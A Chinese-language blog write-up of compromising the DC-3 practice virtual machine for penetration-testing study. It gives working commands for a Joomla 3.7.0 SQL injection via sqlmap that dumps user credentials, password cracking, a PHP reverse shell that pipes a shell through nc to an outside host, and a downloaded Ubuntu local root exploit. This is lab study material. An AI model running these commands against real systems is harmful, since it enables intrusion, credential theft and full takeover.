渗透测试学习之靶机DC-3

过程
1. 探测目标主机

nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.140
在这里插入图片描述

2. 信息搜集
  • 端口信息
    nmap -sV -p 1-65535 192.168.246.140
    在这里插入图片描述
  • web站点的相关服务信息
    在这里插入图片描述
    在这里插入图片描述
3. joomscan扫描站点

从站点信息得到使用joomal,使用joomscan获取信息:
perl joomscan.pl -u http://192.168.246.140
在这里插入图片描述

4. 利用版本漏洞

查找joomla 3.7的相关漏洞信息:
searchsploit joomla 3.7
在这里插入图片描述
查看3.7.0的sql注入相关用法信息:
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
在这里插入图片描述
修改localhost为目标主机IP,获取数据库payload:
sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
在这里插入图片描述
获取joomladb中的表payload:
sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
在这里插入图片描述
可以看到users表。
获取users表中字段名payload:
sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]
在这里插入图片描述
获取表中name,password,username信息payload:
sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]
在这里插入图片描述
使用John the Ripper破解一下:
./john /root/Desktop/dc3.txt
在这里插入图片描述

5. 获取shell

登录后,扩展模板下的Beez3下,可以修改php文件:
在这里插入图片描述
在这里插入图片描述
在modules.php中插入反弹shell的php脚本:
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.246.138 8888 >/tmp/f'); ?>
在这里插入图片描述
保存后在138中开启监听,然后访问该php文件:
http://192.168.246.140/templates/beez3/html/modules.php
在这里插入图片描述

6. 提权

参考链接
查看Ubuntu版本信息:
lsb_release -a
在这里插入图片描述
查找主机系统版本提权漏洞:
searchsploit ubuntu 16.04
在这里插入图片描述
参考大佬文章使用:
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
给了poc和exp的链接,下载exp:
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
在这里插入图片描述
提取39772.zip文件:
unzip 39772.zip
在这里插入图片描述
解压exploit.tar并运行:
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit:解压完tar后进入解压后的目录
./compile.sh
./doubleput
在这里插入图片描述
拿到root权限,进入根目录,得到the-flag.txt。
在这里插入图片描述

总结
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值